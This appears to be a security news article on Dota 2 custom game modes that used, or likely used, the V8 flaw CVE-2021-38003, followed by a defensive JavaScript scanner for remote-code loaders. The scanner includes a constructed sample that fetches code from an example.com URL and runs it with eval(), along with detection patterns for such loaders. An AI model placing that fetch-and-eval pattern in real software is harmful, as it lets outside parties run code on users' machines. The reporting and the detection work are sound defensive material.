Researchers have unearthed four game modes that could successfully exploit a critical vulnerability that remained unpatched in the popular Dota 2 video game for 15 months after a fix had become available.

The vulnerability, tracked as CVE-2021-38003, resided in the open source JavaScript engine from Google known as V8, which is incorporated into Dota 2. Although Google patched the vulnerability in October 2021, Dota 2 developer Valve didn’t update its software to use the patched V8 engine until last month, after researchers privately alerted the company that the critical vulnerability was being targeted.

Unclear intentions

A hacker took advantage of the delay by publishing a custom game mode last March that exploited the vulnerability, researchers from security firm Avast said. That same month, the same hacker published three additional game modes that very likely also exploited the vulnerability. Besides patching the vulnerability last month, Valve also removed all four modes.

Custom modes are extensions or even completely new games that run on top of Dota 2. They allow people with even basic programming experience to implement their ideas for a game and then submit them to Valve. The game maker then puts the submissions through a verification process and, if they’re approved, publishes them.

The first game mode published by Valve appears to be a proof-of-concept project for exploiting the vulnerability. It was titled “test addon plz ignore” (ID 1556548695) and included a description that urged people not to download or install it. Embedded inside the mode was exploit code for CVE-2021-38003. While some of the exploit was taken from proof-of-concept code published in the Chromium bug tracker, the mode developer wrote much of it from scratch. The mode included lots of commented-out code and a file titled “a”, further suggesting the mode was a test.

Avast researchers went on to find three more custom modes that the same developer had published to Valve. These modes, titled “Overdog no annoying heroes” (ID 2776998052), “Custom Hero Brawl” (ID 2780728794), and “Overthrow RTZ Edition X10 XP” (ID 2780559339), took a much more covert approach.

The malicious code in these three new game modes is much more subtle. There is no file named “a” nor any JavaScript exploit directly visible in the source code. Instead, there’s just a simple backdoor consisting of only about twenty lines of code. This backdoor can execute arbitrary JavaScript downloaded via HTTP, giving the attacker not only the ability to hide the exploit code, but also the ability to update it at their discretion without having to update the entire custom game mode (and going through the risky game mode verification process).

The server these three modes contacted was no longer working when Avast researchers discovered the modes. But given that they were published by the same developer 10 days after the first mode, Avast says there’s a high likelihood that the downloaded code also exploited CVE-2021-38003.

In an email, Avast researcher Jan Vojtěšek described the operation flow of the backdoor this way:

1. The victim enters a game, playing one of the malicious game modes.
2. The game loads as expected, but in the background, a malicious JavaScript contacts the game mode’s server.
3. The game mode’s server code reaches out to the backdoor’s C&C server, downloads a piece of JavaScript code (presumably, the exploit for CVE-2021-38003), and returns the downloaded code back to the victim.
4. The victim dynamically executes the downloaded JavaScript.
5. If this was the exploit for CVE-2021-38003, this would result in shellcode execution on the victim machine.
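The backdoor Avast describes has a recognisable shape regardless of what it downloads: a mode script contains a network fetch, and the response body is handed to a sink that turns a string into code. The scanner below is an added example written for this page, not code from Avast, Valve, or any of the modes discussed. The three sample scripts are constructed for the demonstration (the URL uses the reserved example.com domain), and the source and sink names it looks for (XMLHttpRequest, fetch, eval, new Function) are generic JavaScript APIs chosen as an assumption; the page does not say which calls the real backdoor used, and a Panorama-specific request API would need its own entry.

```javascript
'use strict';

// Constructed sample mode scripts for the demonstration. None of this is code
// from a real Dota 2 custom game mode; example.com is the reserved documentation
// domain. backdoored_mode.js mirrors the described flow: fetch over HTTP, then
// hand the response body to eval().
const SAMPLE_MODES = {
  'benign_brawl.js': [
    'var heroes = ["axe", "lina", "pudge"];',
    'function pickHero(i) { return heroes[i % heroes.length]; }',
    'GameEvents.Subscribe("game_start", function () { pickHero(0); });',
  ].join('\n'),
  'backdoored_mode.js': [
    'var srv = "http://example.com/mode/update";',
    'function loadStage(cb) {',
    '  var req = new XMLHttpRequest();',
    '  req.open("GET", srv);',
    '  req.onload = function () { cb(req.responseText); };',
    '  req.send();',
    '}',
    'loadStage(function (code) { eval(code); });',
  ].join('\n'),
  'literal_only.js': [
    'var banner = new Function("return \\"welcome\\"");',
    'banner();',
  ].join('\n'),
};

// Anything that brings bytes in over the network. Assumption: generic browser
// APIs; a Panorama-specific request API would need its own entry here.
const NETWORK_SOURCES = [
  { kind: 'XMLHttpRequest', re: /\bXMLHttpRequest\b/ },
  { kind: 'fetch()', re: /\bfetch\s*\(/ },
  { kind: 'http(s) URL literal', re: /["'`]https?:\/\//i },
];

// Anything that turns a string into executable code. The capture group is the
// first argument, so a literal-string argument can be told apart from a variable.
const CODE_SINKS = [
  { kind: 'eval()', re: /\beval\s*\(([^)]*)\)/ },
  { kind: 'new Function()', re: /\bnew\s+Function\s*\(([^)]*)\)/ },
];

function isStringLiteral(expr) {
  const t = expr.trim();
  return t.length >= 2 && /^["'`]/.test(t) && t[0] === t[t.length - 1];
}

// Scan one script: record every network source and every code sink whose
// argument is not a plain string literal, with line numbers for the reviewer.
function scanModeScript(fileName, source) {
  const lines = source.split('\n');
  const sources = [];
  const sinks = [];
  lines.forEach((text, idx) => {
    const line = idx + 1;
    for (const s of NETWORK_SOURCES) {
      if (s.re.test(text)) sources.push({ kind: s.kind, line });
    }
    for (const k of CODE_SINKS) {
      const m = k.re.exec(text);
      if (m && !isStringLiteral(m[1])) sinks.push({ kind: k.kind, line, arg: m[1].trim() });
    }
  });
  // A dynamic code sink alone is suspicious; a dynamic sink in the same file as
  // a network source is the remote-code-loader shape the article describes.
  let verdict = 'clean';
  if (sinks.length > 0 && sources.length > 0) verdict = 'remote-code-loader';
  else if (sinks.length > 0) verdict = 'dynamic-code';
  return { file: fileName, lineCount: lines.length, sources, sinks, verdict };
}

function scanAll(modes) {
  return Object.entries(modes).map(([file, src]) => scanModeScript(file, src));
}

for (const r of scanAll(SAMPLE_MODES)) {
  console.log(`${r.file} (${r.lineCount} lines): ${r.verdict}`);
  for (const s of r.sources) console.log(`  source ${s.kind} at line ${s.line}`);
  for (const k of r.sinks) console.log(`  sink ${k.kind}(${k.arg}) at line ${k.line}`);
}
```

The eight-line backdoored sample is flagged as a remote-code loader on the strength of its eval(code) call plus two network indicators, while the literal-only script is left alone because a string literal passed to new Function cannot carry downloaded code. A review step like this would not have caught the first, self-contained exploit mode, which carried its payload in plain sight, but it is cheap to run over every submission and catches exactly the property that let the later three modes pass verification with an empty payload.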